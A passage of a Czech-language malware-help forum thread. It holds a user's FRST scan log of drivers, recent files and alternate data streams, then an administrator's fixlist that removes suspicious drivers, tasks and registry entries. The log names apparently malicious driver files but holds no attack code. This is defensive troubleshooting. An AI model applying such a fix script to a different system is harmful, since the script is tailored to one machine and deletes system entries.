S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239544 2023-11-23] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-24 23:31 - 2023-11-24 23:31 - 000003116 _____ C:\Windows\system32\Tasks\AdwCleaner_onReboot
2023-11-24 09:11 - 2023-11-24 09:11 - 000016451 _____ C:\Users\John\Desktop\malware.txt
2023-11-23 21:18 - 2023-11-25 10:19 - 000000000 ____D C:\Users\John\AppData\Local\Malwarebytes
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2023-11-23 21:07 - 2023-11-23 21:07 - 000083385 _____ C:\Users\John\Downloads\Addition.zip
2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-25 11:53 - 2018-05-27 13:28 - 000047211 _____ C:\Users\John\Downloads\FRST.txt
2023-11-25 11:52 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-25 10:56 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-25 10:55 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-25 10:55 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:25 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-25 10:21 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-25 10:21 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2023-11-25 10:20 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-25 10:19 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-25 10:17 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-25 10:16 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-25 10:16 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2023-11-25 10:16 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-25 04:12 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-24 09:12 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-24 09:12 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 21:16 - 2021-07-29 16:20 - 000000000 ____D C:\ProgramData\Malwarebytes
2023-11-23 21:07 - 2018-05-27 13:31 - 000363316 _____ C:\Users\John\Downloads\Addition.txt
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-24 09:12 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================
Přílohy
Addition (2).zip
(80.7 KiB) Staženo 58 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118715
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prihlasovanie do FB, otvaranie okien v browseri

#6 Příspěvek od Rudy »

Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
